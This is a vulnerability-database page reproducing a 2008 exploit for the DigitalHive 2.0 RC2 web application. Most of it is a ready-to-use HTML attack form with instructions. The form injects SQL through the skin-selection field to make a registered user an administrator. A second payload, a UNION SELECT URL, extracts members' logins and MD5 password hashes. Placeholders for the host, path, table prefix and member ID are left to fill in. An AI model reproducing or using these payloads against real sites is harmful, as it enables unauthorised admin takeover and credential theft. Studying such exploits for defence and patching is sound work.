Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit

πŸ—“οΈΒ 11 Jan 2008Β 00:00:00Reported byΒ j0j0TypeΒ 
zdt
Β zdtπŸ”—Β 0day.todayπŸ‘Β 30Β Views

DigitalHive <= 2.0 RC2 Remote SQL Injection exploit by j0j0. Allows unauthorized access through username, password, and RFI vulnerability

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
=============================================================
DigitalHive <= 2.0 RC2 (user_id) Remote SQL Injection Exploit
=============================================================



<!--
    Hive v2.0 RC2 Remote SQL Injection
    c0ded by j0j0
-->
<html>
<head>
<style type="text/css">
body {
    margin:3%;
    font-size:10px;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    background-color:#1a1a1a;
    text-align: center;
}
input {
    background:#303030;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    font-size:10px;
    vertical-align:middle;
    border-left:1px solid #5d5d5d;
    border-right:1px solid #121212;
    border-bottom:1px solid #121212;
    border-top:1px solid #5d5d5d;
    padding: 3px;
    margin: 2px;
}
input[type=text] {
    width: 200px;
}
textarea {
    background:#303030;
    color:#FFFFFF;
    font-family:Verdana,Arial;
    font-size:10px;
    vertical-align:middle;
    border-left:1px solid #121212;
    border-right:1px solid #5d5d5d;
    border-bottom:1px solid #5d5d5d;
    border-top:1px solid #121212;
}
table td {
    font-size: 10px;
    font-family: Verdana, Arial;
}
h3 { color: #CC0000; }
a {
    color: #999999;
    text-decoration: none;
    font-weight: bold;
}
#exploit {
    font-family: Courier New, sans-ms;
    font-size: 12px;
    color: #00FF00;
    width: 400px;
    text-align: left;
}
</style>
</head>
<body>
<center>
<h3>Hive v2.0 RC2 Remote SQL Injection<br /><br />-= c0ded by j0j0 =-</h3>
<br />
<p>you must first create an account, and log in.<br />
then you can send exploit<br />
<span style="color:#cc0000;">don't forget to change the action="" URL of this form</span></p>
<p>&nbps;</p>

<table width="600px" cellspacing="1">
    <tr>
        <td width="20%" class="td5_2">Username</td>
        <td class="td5_1"><input type="text" name="id" value="admin" /></td>
        <td>you will use this username to login</td>
    </tr>
    <tr>
        <td class="td5_2">Password</td>
        <td class="td5_1"><input type="text" name="password" value="admin" /></td>
        <td>you will use this password to login</td>
    </tr>
    <tr>
        <td class="td5_2">Mail</td>
        <td class="td5_1"><input type="text" class="texte" name="mail" size="24" value="[emailΒ protected]" /></td>
        <td>email doesn't have importance</td>
    </tr>
    <tr>
        <td class="td5_2">SQL Injection</td>
        <td colspan="3" class="td5_1">
            <input name="selectskin" type="text" value="purpletech', niveau_num=4 WHERE num=2 /*"/>
        </td>
    </tr>
</table>
<p>purpletech', niveau_num=4 WHERE num=2 /*  <-- niveau_num is for admin access / num is the member id (default admin id is 2)<br /></p>
<br>
<input type="submit" name="submitButtonName" value="Attack">
<p>&nbps;</p>
<p>Now you are admin, logout and re-login with new username/password</p>
<p>There is another one injection   :
<div style="max-width:500px;">
    http://{HOST}/{PATH}/base.php?page=gestion_membre.php&var=profil&user_id=-9999999'/**/UNION/**/SELECT/**/

    0,concat(nick,char(58),pass),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/FROM/**/_user/**/WHERE<br />/**/{SQL_PREFIX}_user.num={MEMBER_ID}/**//*<br />
</div>
<br /><br />
Change {HOST}, {PATH}, {SQL_PREFIX} and {MEMBER_ID}<br />
then look at the "Pseudonyme" field, you've got LOGIN:MD5_PASSWORD)</p>
<!--
Hidden inputs
-->
<input type="hidden" class="texte" name="nom" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="prenom" size="24" value="h4ck3d" >
<input type="hidden" class="texte" name="age" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="icq" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="adresse" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="msn" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="aim" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="hobbie" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="yahoo" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="site" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="text" size="24" value="h4ck3d"  >
<input type="hidden" class="texte" name="selectlangue" size="24" value="h4ck3d"  >
<input type="hidden" value="false" name="online"  >
</form>
</center>
</body>
</html>



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
11 Jan 2008 00:00Current
7.1High risk
Vulners AI Score7.1
digitalhivesql injectionremote exploitj0j0unauthorized accessrfi vulnerability
30
.json
Report